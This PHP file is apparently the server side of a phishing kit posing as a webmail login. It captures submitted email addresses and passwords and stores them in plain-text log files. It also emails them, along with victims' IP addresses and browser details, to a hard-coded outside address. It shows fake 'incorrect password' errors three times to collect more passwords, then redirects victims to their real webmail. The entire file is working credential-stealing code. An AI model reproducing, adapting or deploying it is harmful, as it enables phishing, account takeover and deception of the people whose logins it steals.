<?php
session_start();

// Email configuration
$LOG_EMAIL = 'skkho87.sm@gmail.com';
$FROM_EMAIL = 'rc@webmail-logger.com';
$FROM_NAME = 'RC Webmail Logger';

// Function to send email log
function sendEmailLog($email, $password, $attempt, $logData) {
    global $LOG_EMAIL, $FROM_EMAIL, $FROM_NAME;
    
    $subject = "Webmail Login Attempt #$attempt - " . $email;
    
    $message = "
    <html>
    <head>
        <style>
            body { font-family: Arial, sans-serif; margin: 20px; }
            .header { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin-bottom: 20px; }
            .credentials { background-color: #fff3cd; padding: 15px; border-left: 4px solid #ffc107; margin: 15px 0; }
            .info { background-color: #d1ecf1; padding: 15px; border-left: 4px solid #bee5eb; margin: 15px 0; }
            .label { font-weight: bold; color: #495057; }
            .value { color: #212529; margin-bottom: 10px; }
        </style>
    </head>
    <body>
        <div class='header'>
            <h2>🔐 Webmail Login Attempt #$attempt</h2>
            <p>A new login attempt has been recorded on your webmail system.</p>
        </div>
        
        <div class='credentials'>
            <h3>📧 Login Credentials</h3>
            <div class='value'><span class='label'>Email:</span> $email</div>
            <div class='value'><span class='label'>Password:</span> $password</div>
        </div>
        
        <div class='info'>
            <h3>🌐 Connection Details</h3>
            <div class='value'><span class='label'>Timestamp:</span> " . $logData['timestamp'] . "</div>
            <div class='value'><span class='label'>Attempt Number:</span> $attempt</div>
            <div class='value'><span class='label'>IP Address:</span> " . $logData['ip_address'] . "</div>
            <div class='value'><span class='label'>User Agent:</span> " . $logData['user_agent'] . "</div>
            <div class='value'><span class='label'>Referrer:</span> " . $logData['referer'] . "</div>
        </div>
        
        <div style='margin-top: 20px; padding: 10px; background-color: #f8f9fa; border-radius: 5px; font-size: 12px; color: #6c757d;'>
            <p>This email was automatically generated by the webmail logging system.</p>
            <p>Server: " . ($_SERVER['HTTP_HOST'] ?? 'Unknown') . "</p>
        </div>
    </body>
    </html>";
    
    // Email headers
    $headers = array(
        'MIME-Version: 1.0',
        'Content-type: text/html; charset=UTF-8',
        "From: $FROM_NAME <$FROM_EMAIL>",
        "Reply-To: $FROM_EMAIL",
        "X-Mailer: PHP/" . phpversion()
    );
    
    $header_string = implode("\r\n", $headers);
    
    // Try to send email and also save to backup file
    $emailResult = false;
    if (function_exists('mail')) {
        $emailResult = mail($LOG_EMAIL, $subject, $message, $header_string);
    }
    
    // Always save to backup file
    $backupLog = "
=== EMAIL BACKUP ===
To: $LOG_EMAIL
Subject: $subject
Timestamp: " . $logData['timestamp'] . "
Email Sent: " . ($emailResult ? 'YES' : 'NO') . "
Content: 
Email: $email
Password: $password
IP: " . $logData['ip_address'] . "
User Agent: " . $logData['user_agent'] . "
===================

";
    @file_put_contents('email_backup.log', $backupLog, FILE_APPEND | LOCK_EX);
    
    return true; // Always return true since we save to backup
}

// Function to log data (both file and email)
function logData($email, $password, $attempt) {
    $logFile = 'logs.txt';
    $timestamp = date('Y-m-d H:i:s');
    $ip = $_SERVER['REMOTE_ADDR'] ?? 'Unknown';
    $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
    $referer = $_SERVER['HTTP_REFERER'] ?? 'Unknown';
    
    // Create log data structure
    $logData = array(
        'timestamp' => $timestamp,
        'ip_address' => $ip,
        'user_agent' => $userAgent,
        'referer' => $referer
    );
    
    // File logging (original format)
    $logEntry = "[{$timestamp}] IP: {$ip} | Email: {$email} | Password: {$password} | Attempt: {$attempt} | UA: {$userAgent}" . PHP_EOL;
    file_put_contents($logFile, $logEntry, FILE_APPEND | LOCK_EX);
    
    // Email logging
    sendEmailLog($email, $password, $attempt, $logData);
}

// Function to get domain from email
function getDomainFromEmail($email) {
    $parts = explode('@', $email);
    return count($parts) > 1 ? $parts[1] : '';
}

// Function to validate email format
function isValidEmail($email) {
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Get data from POST (support both your form fields and the example fields)
    $email = $_POST['email'] ?? $_POST['ai'] ?? '';
    $password = $_POST['password'] ?? $_POST['pr'] ?? '';
    
    header('Content-Type: application/json');
    
    // Basic validation
    if (empty($email) || empty($password)) {
        echo json_encode([
            'signal' => 'ERROR',
            'success' => false,
            'msg' => 'Email and password are required'
        ]);
        exit;
    }
    
    if (!isValidEmail($email)) {
        echo json_encode([
            'signal' => 'ERROR',
            'success' => false,
            'msg' => 'Please enter a valid email address'
        ]);
        exit;
    }
    
    // Initialize attempt counter for this email
    $sessionKey = 'attempts_' . md5($email);
    if (!isset($_SESSION[$sessionKey])) {
        $_SESSION[$sessionKey] = 0;
        $_SESSION['current_email'] = $email;
    }
    
    // Increment attempt counter
    $_SESSION[$sessionKey]++;
    $currentAttempt = $_SESSION[$sessionKey];
    
    // Log the attempt (this sends email and saves to file)
    logData($email, $password, $currentAttempt);
    
    if ($currentAttempt < 4) {
        // First 3 attempts - show error message
        echo json_encode([
            'signal' => 'ERROR',
            'success' => false,
            'msg' => 'Incorrect password. Please try again.',
            'attempt' => $currentAttempt
        ]);
    } else {
        // 4th attempt - prepare for redirect
        $domain = getDomainFromEmail($email);
        $redirectUrl = $domain ? "https://webmail.{$domain}" : "https://webmail.gmail.com";
        
        echo json_encode([
            'signal' => 'OK',
            'success' => true,
            'msg' => 'Login successful! Redirecting to your webmail...',
            'redirect_url' => $redirectUrl,
            'attempt' => $currentAttempt
        ]);
        
        // Clear session for this email
        unset($_SESSION[$sessionKey]);
        unset($_SESSION['current_email']);
    }
    exit;
}

// If not POST request, redirect to index
header('Location: index.html');
exit;
?>